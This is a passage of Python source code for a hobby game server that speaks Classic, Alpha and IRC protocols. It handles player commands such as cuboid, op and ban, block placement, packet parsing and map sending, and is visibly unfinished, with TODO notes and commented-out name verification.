0, 'alpha':0}\n # Rewrite this.\n pids = {}\n pids['classic'] = []\n pids['alpha'] = []\n for client in server.clients:\n if client is not self:\n pids['classic'].append(client.pid['classic'])\n pids['alpha'].append(client.pid['alpha'])\n for i, pid in enumerate(pids['classic']):\n if i < pid:\n self.pid['classic']=pid-1\n break\n else:\n self.pid['classic']=pid+1\n for i, pid in enumerate(pids['alpha']):\n if i < pid:\n self.pid['alpha']=pid-1\n break\n else:\n self.pid['alpha']=pid+1\n \n self.persistent_id = 0 ## Set later\n \n self.color = random.choice([\"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"9\", \"a\", \"b\", \"c\", \"d\", \"e\"])\n \n self.last_message = None\n self.message_queue = []\n \n self.block_queue = []\n \n self.positionable = True\n self.pos_changed = True\n self.x = 0\n self.y = 0\n self.stance = 65.0\n self.z = 0\n self.heading = 0\n self.pitch = 0\n self.holding = 0\n \n self.spawned = None\n self.despawn = False\n self.disconnected = False\n \n self.disconnect_reason = None\n \n self.float = None\n self.marking = False\n self.about = False\n self.paint = False\n self.fuckedtree=False\n self.cuboid = 0 ## Send block changes to cuboid if set\n self.cuboid_x = 0\n self.cuboid_y = 0\n self.cuboid_z = 0\n self.cuboid_with = None\n \n #self.inventory = [Item(B['tnt'], 1, 0)]*45 ## MUCH BETTER\n \n first_id, = struct.unpack(\">B\", first_byte)\n if first_id == PC_IDENT: self.protocol = ClassicProtocol(self, conn, addr, first_id) #todo: make this send first_byte not id\n elif first_id == PA_HANDSHAKE: self.protocol = AlphaProtocol (self, conn, addr, first_id)\n elif first_byte in (b\"C\", b\"N\"):self.protocol = IRCProtocol (self, conn, addr, first_byte)\n else: print(\"Undetected client by first byte: {}\".format(first_id))\n \n def __str__(self):\n return (\"Player {}, protocol {}, pids {}; {}\".format(self.name, self.protocol.NAME, self.pid, self.addr))\n \n def format_name(self):\n return (\"§{}{}\".format(self.color, self.name))\n \n def get_last_message(self):\n last_message = self.last_message\n self.last_message = None\n return last_message\n \n def parse_message(self, message):\n if message[0] == \"/\": # It's a command!\n args = message[1:].split(\" \")\n if args[0] == \"float\":\n if self.float != None:\n self.float = None\n self.message_queue.append(\"§eFLOAT: §cDisabled.\")\n else:\n self.float = self.y\n self.message_queue.append(\"§eFLOAT: §aEnabled.\") \n elif args[0] == \"cuboid\":\n if server.get_class_for_persistent_id(self.persistent_id) == 'OP':\n if len(args)>1:\n try:\n B[args[1]]\n except KeyError:\n self.message_queue.append(\"§eCUBOID: §cInvalid/Unknown block type\")\n else:\n self.cuboid = 1\n self.cuboid_with = args[1]\n self.message_queue.append(\"§eCUBOID: The block type §f{}§e will be used to cuboid.\".format(self.cuboid_with))\n else:\n self.message_queue.append(\"§eCUBOID: The second point's block will be used to cuboid.\")\n self.cuboid = 1\n if self.cuboid == 1:\n self.marking = True\n self.message_queue.append(\"§eCUBOID: Change two blocks to specify corners of cuboid.\")\n else:\n self.message_queue.append(\"§eCUBOID: You need to be OP to use CUBOID\")\n elif args[0] == \"about\":\n self.message_queue.append(\"§eABOUT: Mark a block to get its info.\")\n self.about = True\n self.marking = True\n elif args[0] == \"paint\":\n if self.paint:\n self.paint = False\n self.message_queue.append(\"§ePAINT: §cDisabled.\")\n else:\n self.paint = True\n self.message_queue.append(\"§ePAINT: §aEnabled.§e Destroyed blocks will be painted.\")\n elif args[0] == \"regen\":\n if len(args)>1: # this does not work\n server.main.map_x=args[1]\n server.main.map_y=args[2]\n server.main.map_z=args[3]\n server.main.create_landscape()\n server.main.spam_blocks() ## Spams blocks to global block queue - Reloads map under players' feet :D\n ##self.protocol.send_map()\n elif args[0] == \"save\":\n if server.get_class_for_persistent_id(self.persistent_id) == 'OP':\n server.main.save(\"map.twnsrv\")\n server.message_queue.append(\"§eSAVE: §aMap saved.\")\n else:\n self.message_queue.append(\"§eSAVE: §cYou need to be OP to use SAVE\")\n elif args[0] == \"op\":\n if server.get_class_for_persistent_id(self.persistent_id) == 'OP':\n pid = server.find_persistent_id(args[1])\n if pid != None:\n server.set_class_for_persistent_id(pid,'OP')\n server.save_persistent_ids()\n self.message_queue.append(\"§eOP: &a\"+server.get_name_for_persistent_id(pid)+\" was promoted to op\")\n else:\n self.message_queue.append(\"§eOP: §cUnknown player name.\")\n else:\n self.message_queue.append(\"§eOP: §cYou need to be OP to use OP\")\n elif args[0] == \"deop\":\n if server.get_class_for_persistent_id(self.persistent_id) == 'OP':\n pid = server.find_persistent_id(args[1])\n if pid != None:\n server.set_class_for_persistent_id(pid,'')\n server.save_persistent_ids()\n self.message_queue.append(\"§eDEOP: &a\"+server.get_name_for_persistent_id(pid)+\" was demoted from op\")\n else:\n self.message_queue.append(\"§eDEOP: §cUnknown player name.\")\n else:\n self.message_queue.append(\"§eDEOP: §cYou need to be OP to use DEOP\")\n elif args[0] == \"ban\":\n if server.get_class_for_persistent_id(self.persistent_id) == 'OP':\n pid = server.find_persistent_id(args[1])\n if pid != None:\n server.set_class_for_persistent_id(pid,'BAN')\n server.save_persistent_ids()\n ## FIXME: Kick player here\n self.message_queue.append(\"§eBAN: &a\"+server.get_name_for_persistent_id(pid)+\" was banned\")\n else:\n self.message_queue.append(\"§eBAN: §cUnknown player name.\")\n else:\n self.message_queue.append(\"§eBAN: §cYou need to be OP to use BAN\")\n elif args[0] == \"ban\":\n if server.get_class_for_persistent_id(self.persistent_id) == 'OP':\n pid = server.find_persistent_id(args[1])\n if pid != None:\n if server.get_class_for_persistent_id(pid)=='BAN':\n server.set_class_for_persistent_id(pid,'')\n server.save_persistent_ids()\n self.message_queue.append(\"§eUNBAN: &a\"+server.get_name_for_persistent_id(pid)+\" was unbanned\")\n else:\n self.message_queue.append(\"§eUNBAN: §cPlayer is not banned.\")\n else:\n self.message_queue.append(\"§eUNBAN: §cUnknown player name.\")\n else:\n self.message_queue.append(\"§eUNBAN: §cYou need to be OP to use UNBAN\")\n else:\n self.message_queue.append(\"§cUnknown command.\")\n else:\n self.last_message = message\n \n def placed_block(self, x, y, z, block_type, face = None):\n if self.marking:\n self.block_queue.append((x, y, z))\n self.marking = False\n \n if self.cuboid == 1:\n self.cuboid_x = x\n self.cuboid_y = y\n self.cuboid_z = z\n self.cuboid = 2\n self.message_queue.append(\"§eCUBOID: First point set - x: {} y: {} z: {}\".format(x, y, z))\n self.marking = True\n elif self.cuboid == 2:\n self.message_queue.append(\"§eCUBOID: Second point set - x: {} y: {} z: {}\".format(x, y, z))\n self.message_queue.append(\"§eCUBOID: §cCreating...\")\n blocks = server.main.cuboid(self.cuboid_x,self.cuboid_y,self.cuboid_z,x,y,z,block_type if self.cuboid_with==None else B[self.cuboid_with],0,self.persistent_id) ## Fix the first 0!\n self.message_queue.append(\"§eCUBOID: §aDone cuboiding {} blocks\".format(blocks))\n self.cuboid = 0\n self.cuboid_with = None\n elif self.about:\n self.about = False\n self.message_queue.append(\"§eABOUT: x: {} y: {} z: {} - {}\".format(x, y, z, server.main.map[x][y][z]))\n elif self.fuckedtree:\n self.fuckedtree = False\n server.main.place_fucked_tree(x, y, z)\n else:\n metadata = None\n if block_type == 0x00 and self.paint == True:\n block_type = self.holding\n elif block_type == B['step']:\n if server.main.block_at(x,y-1,z).get(None) == ['step']: ## If block below is a step \n self.block_queue.append((x, y, z))\n y = y-1\n self.block_queue.append((x, y, z))\n block_type = B['doublestep']\n elif block_type in (B['ladder'], B['furnace'], B['burningfurnace'], B['wallsign']):\n if face in (2, 3, 4, 5): metadata = face\n elif block_type == B['signpost']:\n if face == 2: metadata = 8\n elif face == 3: metadata = 0\n elif face == 4: metadata = 4\n elif face == 5: metadata = 12\n elif block_type in (B['pumpkin'], B['jackolantern']):\n if face == 2: metadata = 0\n elif face == 3: metadata = 2\n elif face == 4: metadata = 3\n elif face == 5: metadata = 1\n elif block_type in (B['woodenstairs'], B['cobblestonestairs']):\n if face == 2: metadata = 2\n elif face == 3: metadata = 3\n elif face == 4: metadata = 0\n elif face == 5: metadata = 1\n elif block_type in (B['stonebutton'], B['lever']):\n if face == 2: metadata = 0\n elif face == 3: metadata = 3\n elif face == 4: metadata = 2\n elif face == 5: metadata = 1\n elif block_type == B['lever']: metadata = 5\n elif block_type == B['torch'] or block_type == B['redstonetorchon'] or block_type == B['redstonetorchoff']:\n if face == 2: metadata = 4\n elif face == 3: metadata = 3\n elif face == 4: metadata = 2\n elif face == 5: metadata = 1\n else: metadata = 0\n if server.main.set_block(x,y,z,block_type,0,self.persistent_id,metadata) == None: ## Fix the first 0\n if debug: self.message_queue.append(\"§cYou can't build there!\")\n pass\n \n def step(self):\n self.protocol.step()\n for message in self.message_queue:\n self.protocol.send_message(message)\n self.message_queue = []\n for x, y, z in self.block_queue:\n self.protocol.send_set_block(x, y, z, server.main.map[x][y][z])\n self.block_queue = []\n if self.float != None:\n if self.y < self.float:\n self.y = self.float\n self.protocol.send_player_teleport(self)\n\nclass ClassicProtocol:\n \"\"\" A class handling the Classic protocol for Client. \"\"\"\n def __init__(self, client, conn, addr, first_id): \n #self.pid = server.last_pid+1\n \n self.client = client\n self.conn = conn\n self.addr = addr\n \n #server.last_pid = self.pid\n \n self.spawned = None\n \n self.last_packet = b\"\"\n self.last_packet_id = first_id\n self.last_packet_len = self.packet_len(first_id)\n \n self.COLORCHAR = \"&\"\n self.NAME = \"classic\"\n \n def __str__(self):\n return self.NAME\n \n #This actually still makes it crash sometimes\n \n # DUMMY FUNCTIONS\n def classic_to_alpha(self, x, y, z, heading, pitch):\n #y -= 50\n #heading = math.floor(360*(heading/255))\n #pitch = math.floor(360*(pitch/255))\n return (x, y-50, z, (heading-127) % 255, pitch)\n def alpha_to_classic(self, x, y, z, heading, pitch):\n #y += 50\n return (int(x), int(y)+50, int(z), (heading+127)%255, pitch)\n \n def recv(self):\n try: recv = self.conn.recv(1)\n except socket.error: return\n if recv == b\"\": return;\n if self.last_packet_id == None:\n self.last_packet_id, = struct.unpack(\">B\",recv)\n try: PACKETS[self.last_packet_id]\n except KeyError: \n print (\"Unknown packet id: {}\".format(packet_id))\n self.last_packet_id = None\n return\n else:\n self.last_packet_len = self.packet_len(self.last_packet_id)\n #print(\"Packet id is %s, len %d\" % (self.last_packet_id, self.last_packet_len))\n else:\n self.last_packet += recv\n if len(self.last_packet) == self.last_packet_len:\n self.parse_packet(self.last_packet_id, self.last_packet)\n self.last_packet = b\"\"\n self.last_packet_id = None\n self.last_packet_len = 0\n \n def parse_packet(self, packet_id, packet):\n def unstring(string):\n return string.decode(\"ASCII\").strip()\n try: fields = struct.unpack(\">\"+PACKETS[packet_id], packet)\n except struct.error:\n print (\"INVALID PACKET - ID {} - {}\".format(packet_id, packet))\n return\n #print (\"Recv: {}\".format(packet_id), end=\" \")\n if packet_id == PC_IDENT:\n protocol_version, username, verification_key, u1 = fields\n self.client.name = unstring(username)\n #if server.online_mode an # <- wtf you messed this up\n\n #if verification_key != hashlib.md5(server.salt.encode(\"ASCII\")+self.client.name.encode(\"ASCII\")).hexdigest:\n # print (\"{} tried to connect, but verification was incorrect!\".format(self.client.name))\n # self.send_packet(PC_DISCONNECT, \"Wrong verification.\")\n # return\n pid = server.find_persistent_id(self.client.name)\n if pid == None:\n pid = server.add_persistent_id(self.client.name)\n self.client.persistent_id = pid\n if server.get_class_for_persistent_id(pid) == 'BAN':\n ## FIXME: Kick player here\n self.disconnect(\"Banned\")\n print(\"Player is banned! (FIXME)\")\n pass\n \n verification_key = unstring(verification_key)\n #print (\"PC_IDENT Version: %d; Username: %s; Verification key: %s; u1: %d\" % (protocol_version, self.client.name, verification_key, u1))\n # Veridication to come here.\n self.send_packet(PC_IDENT, 7, server.name, server.motd, 42)\n self.send_map()\n self.send_packet(PC_PLAYER_TELEPORT, 0xff, (server.main.map_x//2)*32, (server.main.map_y)*32, (server.main.map_z//2)*32, 0, 0)\n self.client.spawned = False\n \n elif packet_id == PC_SET_BLOCK_CLIENT:\n x, y, z, mode, block_type = fields \n self.client.holding = block_type\n if server.main.block_at(x, y, z): self.client.placed_block(x, y, z, block_type if mode else 0x00)\n \n elif packet_id == PC_PLAYER_TELEPORT:\n p, x, y, z, heading, pitch = fields\n x, y, z, heading, pitch = self.classic_to_alpha(x, y, z, heading, pitch)\n if (0xff, self.client.x, self.client.y, self.client.z, self.client.heading, self.client.pitch) != (p, x, y, z, heading, pitch):\n self.client.pos_changed = True\n self.client.x, self.client.y, self.client.z, self.client.heading, self.client.pitch = x, y, z, heading, pitch\n #print (\"PC_PLAYER_TELEPORT pid: {}, xyz: {} {} {}, heading: {}, pitch: ?\".format(pid, x, y, z, heading))\n \n elif packet_id == PC_MESSAGE:\n u1, message = fields\n message = unstring(message)\n self.client.parse_message(message)\n \n def kick(self, reason):\n self.send_packet(PC_DISCONNECT, reason)\n self.disconnect()\n \n def disconnect(self, reason):\n #self.send_packet(PC_DISCONNECT, reason) #Right, infinite loop.\n self.conn.close()\n self.client.despawn = True\n self.client.disconnect_reason = reason\n \n def build_packet(self, packet_id, *arguments):\n try:\n return struct.pack(\">B\"+PACKETS[packet_id], packet_id, *arguments)\n except struct.error as err:\n print (\"!!! struct.error: {} (packet {}, arguments: {})\".format(err, packet_id, \", \".join(str(argument) for argument in arguments)))\n raise\n \n def packet_len(self, packet_id):\n return struct.calcsize(\">\"+PACKETS[packet_id])\n\n def send_packet(self, packet_id, *arguments):\n packet = self.build_packet(packet_id, *arguments)\n #print (str(self.client.pid['classic'])+\">\"+str(packet)) #OW MEMORY CPU OW OW OW\n if self.client.disconnected == False:\n try: self.conn.send(packet)\n except socket.error:\n self.disconnect(None)\n \n def send_message(self, message):\n message = message.replace(\"§\", self.COLORCHAR)\n # This is ugly.\n len = 0\n displen = 0\n prevchar = \"\"\n last_color = \"\"\n splitted = False\n for char in message:\n #print(\"{} {} {} {} {}\".format(char, len, displen, prevchar, last_colorchar))\n if displen==64:\n self.send_packet(PC_MESSAGE, 0x00, message[:len])\n splitted = True\n break\n len+=1\n if char != self.COLORCHAR and prevchar != self.COLORCHAR: displen+=1\n if prevchar == self.COLORCHAR: last_color = char\n prevchar = char\n self.send_packet(PC_MESSAGE, 0x00, self.COLORCHAR+last_color+message[len:] if splitted else message)\n def send_set_block(self, x, y, z, block):\n self.send_packet(PC_SET_BLOCK_SERVER, x, y, z, block.get(self.NAME))\n def send_spawn_player(self, client):\n x, y, z, heading, pitch = self.alpha_to_classic(client.x, client.y, client.z, client.heading, client.pitch)\n print( client.pid[self.NAME], client.name, x, y, z, heading, pitch)\n self.send_packet(PC_SPAWN_PLAYER, client.pid[self.NAME], client.name, x, y, z, heading, pitch)\n def send_despawn_player(self, client):\n self.send_packet(PC_DESPAWN_PLAYER, client.pid[self.NAME])\n def send_player_teleport(self, client):\n x, y, z, heading, pitch = self.alpha_to_classic(client.x, client.y, client.z, client.heading, client.pitch)\n self.send_packet(PC_PLAYER_TELEPORT, client.pid[self.NAME], x, y, z, heading, pitch)\n def send_map(self):\n self.send_packet(PC_LEVEL_INIT)\n with server.main.gzip_map() as gzipdata:\n self.send_packet(PC_IDENT, 7, server.name, \"Almost there!\", 42)\n while True:\n chunk = gzipdata.read(1024)\n self.send_packet(PC_LEVEL_CHUNK, len(chunk), chunk, random.randrange(0, 100, 1))\n if len(chunk) < 1024:\n break\n self.send_packet(PC_LEVEL_FINALIZE, server.main.map_x,server.main.map_y,server.main.map_z)\n \n def step(self):\n self.recv()\n \n \n\nclass AlphaProtocol:\n \"\"\" A class handling the Alpha protocol for Client. \"\"\"\n def __init__(self, client, conn, addr, first_id): \n \n self.client = client\n self.conn = conn\n self.addr = addr\n \n #self.pid = server.last_pid+1\n #server.last_pid = self.pid\n #self.spawned = None\n #self.despawn = False\n #self.disconnected = False\n \n self.last_packet = () # tuple !\n self.first_id = first_id\n self.last_packet_id = None\n self.last_packet_struct_pos = 0\n self.last_packet_format_pos = 0\n #self.last_packet_format_len = struct.calcsize(\">\"+A_PACKETS[self.last_packet_id][self.last_packet_struct_pos])\n self.last_packet_format_len = None\n self.last_packet_format_bts = b\"\"\n self.last_packet_string = False\n self.last_packet_item = False\n self.last_timeout = time.time()\n \n self.block_hit = 0\n \n self.inventory_page = 0\n \n self.COLORCHAR = \"§\"\n self.NAME = \"alpha\"\n \n def __str__(self):\n return self.NAME\n \n def recv(self):\n if self.first_id != None: # this is a hack D:\n recv = struct.pack(\">B\", self.first_id)\n self.first_id = None\n else:\n try: recv = self.conn.recv(1)\n except socket.error: return\n if recv == b\"\": return\n #print (recv, end=\"\")\n if self.last_packet_id == None:\n self.last_packet_id, = struct.unpack(\">B\",recv)\n try: A_PACKETS[self.last_packet_id]\n except KeyError: \n print (\"Unknown packet id: {}\".format(packet_id))\n self.last_packet_id = None\n return\n else:\n #fun stuff!\n self.last_packet_struct_pos = 0\n self.last_packet_format_pos = 0\n if len(A_PACKETS[self.last_packet_id])==0:\n self.last_packet_format_len = 0\n self.parse_packet(self.last_packet_id, ())\n self.last_packet_id = None\n self.last_packet = ()\n else:\n cur_format = A_PACKETS[self.last_packet_id][self.last_packet_struct_pos]\n if cur_format == \"S\":\n self.last_packet_format_len = 2\n else: \n self.last_packet_format_len = struct.calcsize(\">\"+cur_format)\n else:\n self.last_packet_format_bts+=recv\n self.last_packet_format_pos+=1\n if debug: print (\"{}/{}- {} >> {} [id {}]\".format(self.last_packet_format_pos, self.last_packet_format_len, self.last_packet_format_bts, self.last_packet, str(hex(self.last_packet_id))))\n if self.last_packet_format_pos == self.last_packet_format_len:\n if A_PACKETS[self.last_packet_id][self.last_packet_struct_pos] == \"S\":\n if self.last_packet_string == False:\n self.last_packet_string = True\n self.last_packet_format_len, = struct.unpack(\">h\",self.last_packet_format_bts)\n self.last_packet_format_pos = 0\n self.last_packet_format_bts = b\"\"\n else:\n self.last_packet += struct.unpack(\">\"+str(self.last_packet_format_len)+\"s\", self.last_packet_format_bts)[0].decode(\"utf-8\"), #ugly but does the job\n self.last_packet_string = False\n self.last_packet_format_bts = b\"\"\n self.last_packet_struct_pos+= 1\n elif self.last_packet_item:\n if self.last_packet_item == 1 and struct.unpack(\">h\",self.last_packet_format_bts)[0] == -1:\n self.last_packet_item = False\n self.last_packet_struct_pos+= 1\n elif self.last_packet_item == 1: \n self.last_packet[-1].type, = struct.unpack(\">h\",self.last_packet_format_bts)\n self.last_packet_format_len = 1\n self.last_packet_item+=1\n elif self.last_packet_item == 2:\n self.last_packet[-1].amount, = struct.unpack(\">B\",self.last_packet_format_bts)\n self.last_packet_format_len = 1\n self.last_packet_item+=1\n elif self.last_packet_item == 3:\n self.last_packet[-1].uses, = struct.unpack(\">B\",self.last_packet_format_bts)\n self.last_packet_item = False\n self.last_packet_struct_pos+= 1\n self.last_packet_format_pos = 0\n self.last_packet_format_bts = b\"\"\n \n else:\n self.last_packet += struct.unpack(\">\"+A_PACKETS[self.last_packet_id][self.last_packet_struct_pos], self.last_packet_format_bts)\n self.last_packet_format_bts = b\"\"\n self.last_packet_struct_pos+= 1\n if self.last_packet_struct_pos == len(A_PACKETS[self.last_packet_id]):\n #print (\"Finished reading packet id {}! {}\".format(str(hex(self.last_packet_id)), self.last_packet))\n self.parse_packet(self.last_packet_id, self.last_packet)\n self.last_packet_id = None\n self.last_packet = ()\n elif self.last_packet_format_pos == self.last_packet_format_len:\n cur_format = A_PACKETS[self.last_packet_id][self.last_packet_struct_pos]\n if cur_format == \"S\":\n self.last_packet_format_len = 2\n elif cur_format == \"T\": \n self.last_packet_format_len = 2\n self.last_packet_item = 1\n self.last_packet+=(Item(None),)\n else: \n self.last_packet_format_len = struct.calcsize(\">\"+cur_format)\n self.last_packet_format_pos = 0\n \n \n def alpha_pos_to_storage(self, x, y, stance, z, on_ground=None):\n x = int(x*32)\n y = int(y*32)\n stance = int(stance*32)\n z = int(z*32)\n if on_ground != None: return x, y, stance, z, on_ground\n return x, y, stance, z\n \n def alpha_rot_to_storage(self, yaw, pitch, on_ground = None):\n while yaw > 360:\n yaw = yaw - 360\n while yaw < 0:\n yaw = yaw + 360\n yaw = math.floor(0xff*(yaw/360))\n while pitch > 360:\n pitch = pitch - 360\n while pitch < 0:\n pitch = pitch + 360\n pitch = math.floor(0xff*(pitch/360))\n if on_ground != None: return yaw, pitch, on_ground\n return yaw, pitch\n \n def alpha_to_storage(self, x, stance, y, z, yaw, pitch, on_ground):\n return self.alpha_pos_to_storage(x, stance, y, z)+self.alpha_rot_to_storage(yaw, pitch)+(on_ground,)\n \n def parse_packet(self, packet_id, fields):\n pass\n if packet_id == PA_HANDSHAKE:\n self.client.name, = fields\n self.send_packet(PA_HANDSHAKE, \"-\") # TODO: Name verification.\n \n if packet_id == PA_IDENT:\n protocol_version, self.client.name, password, map_seed, dimension = fields\n self.send_packet(PA_IDENT, self.client.pid['alpha'], server.name, server.motd, 1337, 0) \n ##self.send_packet(PA_PRE_CHUNK, 0, 0, 1)\n ##self.send_map_chunk(0, 0, 0)\n self.send_map_chunks()\n self.send_packet(PA_SPAWN_POSITION, 0, 0, 0) ## Compass\n #self.send_player_inventory(self.client.inventory)\n self.send_inventory_page(0)\n #self.send_window_items(0, [Item(B['glass'], 1, 0)]*44)\n ##self.client.x = server.main.map_x//2*32\n self.client.x = 16//2*32\n self.client.y = server.main.map_y *32\n ##self.client.z = server.main.map_z//2*32\n self.client.z = 16//2*32\n self.send_packet(PA_PLAYER_POSITION_AND_LOOK, self.client.x/32, self.client.y/32, self.client.stance, self.client.z/32, self.client.heading, self.client.pitch, False)\n #print (\"Sent X,Y,Z:\"+str(self.client.x/32)+\",\"+str(self.client.y/32)+\",\"+str(self.client.z/32))\n self.client.spawned = False\n \n pid = server.find_persistent_id(self.client.name)\n if pid == None:\n pid = server.add_persistent_id(self.client.name)\n self.client.persistent_id = pid\n if server.get_class_for_persistent_id(pid) == 'BAN':\n ## FIXME: Kick player here\n self.disconnect(\"Banned\")\n print(\"Player is banned! (FIXME)\")\n pass\n \n \n if packet_id == PA_PLAYER_POSITION:\n x, y, stance, z, on_ground = self.alpha_pos_to_storage(*fields)\n if (self.client.x, self.client.y, self.client.stance, self.client.z) != (x, y, stance, z):\n self.client.pos_changed = True\n self.client.x, self.client.y, self.client.stance, self.client.z = x, y, stance, z\n if packet_id == PA_PLAYER_LOOK:\n heading, pitch, on_ground = self.alpha_rot_to_storage(*fields)\n if (self.client.heading, self.client.pitch) != (heading, pitch):\n self.client.pos_changed = True\n self.client.heading, self.client.pitch = heading, pitch\n \n if packet_id == PA_PLAYER_POSITION_AND_LOOK:\n x, y, stance, z, heading, pitch, on_ground = self.alpha_to_storage(*fields)\n if (self.client.x, self.client.stance, self.client.y, self.client.z, self.client.heading, self.client.pitch) != (x, stance, y, z, heading, pitch):\n self.client.pos_changed = True\n self.client.x, self.client.stance, self.client.y, self.client.z, self.client.heading, self.client.pitch = x, stance, y, z, heading, pitch\n if packet_id == PA_CHAT_MESSAGE:\n message, = fields\n self.client.parse_message(message)\n if packet_id == PA_PLAYER_DIGGING:\n status, x, y, z, face = fields\n if status in (0, 2):\n self.block_hit = 0\n if status == 1:\n self.block_hit+= 1\n if status in (3, 4) or self.block_hit > 3:\n self.block_hit = 0\n if server.main.block_at(x, y, z) and server.main.block_at(x, y, z).get(\"alpha\")!=B['bedrock']: self.client.placed_block(x, y, z, 0x00, face)\n if packet_id == PA_PLAYER_BLOCK_PLACEMENT:\n x, y, z, face, item = fields\n if item.type != None and item.type < 256:\n # todo: rewrite this\n if face == 0: y-=1\n elif face == 1: y+=1\n elif face == 2: z-=1\n elif face == 3: z+=1\n elif face == 4: x-=1\n elif face == 5: x+=1\n if server.main.block_at(x, y, z): self.client.placed_block(x, y, z, item.type, face)\n if packet_id == PA_WINDOW_CLICK:\n window_id, slot, right_click, action_number, item = fields\n if window_id == 0:\n if slot == -999: # Notch's arbitrary numbers. Is outside of window\n pass\n elif slot == 35:\n self.send_set_slot(0, slot, Item(None))\n self.send_inventory_page(self.inventory_page+1)\n elif slot == 9:\n self.send_set_slot(0, slot, Item(None))\n self.send_inventory_page(self.inventory_page-1)\n elif slot < 36:\n if right_click:\n self.client.message_queue.append(\"§eBlock {} ({}{})\".format(item.type, get_block_name(item.type), get_block_conversions(item.type)))\n self.send_set_slot(0, slot, item)\n self.send_set_slot(-1, 0, Item(None))\n else:\n self.send_set_slot(0, slot, item)\n if packet_id == PA_DISCONNECT_OR_KICK:\n self.client.despawn = True\n self.client.disconnect_reason, = fields\n \n \n def send_packet(self, packet_id, *args):\n to_send = struct.pack(\">B\", packet_id)\n for format, field in zip(A_PACKETS[packet_id], args):\n if format == \"S\":\n to_send += struct.pack(\">H{}s\".format(len(field)), len(field), field)\n else:\n try: to_send += struct.pack(\">\"+format, field)\n except struct.error as err:\n print (\"!!! struct.error: {} (packet {}, arguments: {} - field/format {}/{})\".format(err, packet_id, \", \".join(str(argument) for argument in args), field,format))\n raise\n self.send(to_send)\n \n def send(self, send):\n if self.client.disconnected == False:\n try: self.conn.send(send)\n except socket.error:\n self.disconnect()\n \n def send_message(self, message):\n self.send_packet(PA_CHAT_MESSAGE, message+\" \")# <- \"hack\" # also todo: make this prettify multiple lines\n def send_map_chunks(self):\n def send_map_chunk(i,j):\n to_send = struct.pack(\">bihibbb\", PA_MAP_CHUNK, i,0,j, 16-1, server.main.map_y-1, 16-1)\n zlib_map = server.main.zlib_map(i,0,j,16,server.main.map_y,16)\n to_send += struct.pack(\">i{}s\".format(len(zlib_map)), len(zlib_map), zlib_map)\n self.send_packet(PA_PRE_CHUNK,i//16,j//16,1)\n self.send(to_send)\n negboundaries = 2\n posboundaries = 2\n #threads = []\n for i in range(0-16*negboundaries,server.main.map_x+16*posboundaries,16): ## +/-16*2 for boundaries\n for j in range(0-16*negboundaries,server.main.map_z+16*posboundaries,16):\n #threads.append(threading.Thread(None,send_map_chunk,None,(i,j)))\n #for i in threads:\n # i.run()\n send_map_chunk(i, j)\n def send_set_slot(self, window, slot, item):\n to_send = struct.pack(\">Bbh\", PA_SET_SLOT, 0, slot) +item.pack()\n self.send(to_send)\n def send_window_items(self, window_id, items):\n to_send = struct.pack(\">Bbh\", PA_WINDOW_ITEMS, window_id, len(items))\n for item in items:\n to_send += item.pack()\n self.send(to_send)\n def send_set_block(self, x, y, z, block):\n self.send_packet(PA_BLOCK_CHANGE, x, y, z, block.get(self.NAME), block.high())\n def send_spawn_player(self, client):\n self.send_packet(PA_NAMED_ENTITY_SPAWN, client.pid[self.NAME], client.name, client.x, client.y, client.z, client.heading, client.pitch, client.holding)\n def send_despawn_player(self, client):\n self.send_packet(PA_DESTROY_ENTITY, client.pid[self.NAME])\n def send_player_teleport(self, client):\n self.send_packet(PA_ENTITY_TELEPORT, client.pid[self.NAME], client.x, client.y, client.z, client.heading, client.pitch)\n \n def send_inventory_page(self,page):\n if page != -1:\n self.inventory_page = page\n inventory = [Item(None)]*10\n for i in range(page*24+1, page*24+26):\n if i>len(A_INVENTORY)-1: \n inventory+=[Item(None)]\n else:\n inventory+=[Item(A_INVENTORY[i], 255, 0)]\n self.send_window_items(0, inventory)\n \n \n def kick(self, reason):\n self.send_packet(PC_DISCONNECT, reason)\n self.disconnect()\n \n def disconnect(self):\n self.conn.close()\n self.client.despawn = True\n self.client.disconnect_reason = \"Lost connection\"\n \n def step(self):\n self.recv()\n if self.client.spawned and self.client.pos_changed:\n if self.client.x < 8 or self.client.z < 8 or self.client.x > (server.main.map_x*32)-8 or self.client.z > (server.main.map_z*32)-8 or self.client.y < 8:\n if self.client.x < 8: self.client.x = 8\n if self.client.x > (server.main.map_x*32)-8: self.client.x = server.main.map_x*32-8\n if self.client.z < 8: self.client.z = 8\n if self.client.z > (server.main.map_z*32)-8: self.client.z = server.main.map_z*32-8\n if self.client.y < 0: self.client.y = server.main.map_y*32\n self.send_packet(PA_PLAYER_POSITION_AND_LOOK, self.client.x/32, math.ceil((self.client.y/32)+1.5), self.client.stance, self.client.z/32, self.client.heading, self.client.pitch, True)\n if time.time() - self.last_timeout > 5: ## Timeout prevention\n self.send_packet(PA_KEEPALIVE)\n self.last_timeout = time.time()\n\nclass IRCProtocol:\n \"\"\" A class handling the IRC protocol for Client. \"\"\"\n \n def __init__(self, client, conn, addr, first_byte): \n self.NAME = \"irc\"\n self.client = client\n self.conn = conn\n self.addr = addr\n \n \n self.last_packet = first_byte.decode(\"ascii\")\n \n self.hostname = None\n self.realname = None\n self.servername = \"\"\n \n self.client.pos_changed = False\n self.client.positionable = False\n print (self.client.pos_changed)\n \n def __str__(self): return self.NAME\n \n def get_full_client_name(self, client = None):\n if client == None: client = self.client\n return client.name+\"!\"+client.protocol.NAME+\"@\"+client.protocol.addr[0]\n \n def recv(self):\n try:\n self.last_packet += self.conn.recv(1).decode(\"utf-8\")\n except socket.error:\n pass\n if self.last_packet[-2:] == \"\\r\\n\":\n self.parse_packet(self.last_packet)\n self.last_packet = \"\"\n \n def parse_packet(self, packet):\n argument = packet[packet.find(\":\")+1:].strip()\n packet = packet[:packet.find(\":\")].strip().split(\" \")\n command = packet[0]\n fields = ()\n for field in packet[1:]: fields+=(field.strip(),)\n print (command, fields, argument)\n if command == \"NICK\" and len(fields) > 0:\n self.client.name, = fields\n elif command == \"USER\" and len(fields) > 2:\n self.client.name, self.hostname, self.servername = fields\n self.realname = argument\n \n self.client.spawned = False\n \n self.send_packet(self.servername, \"001 \"+self.client.name, \"Welcome to this IRC server {}\".format(self.get_full_client_name()))\n self.send_packet(self.servername, \"002 \"+self.client.name, \"Your host is {}, running custom server software\".format(server.name))\n self.send_packet(self.servername, \"003 \"+self.client.name, \"This server was created today, or possibly earlier\")\n self.send_packet(self.servername, \"004 \"+self.client.name+\" \"+self.servername+\" twinserv\")\n \n self.send_packet(self.get_full_client_name(), \"JOIN\", \"#main\")\n \n elif command 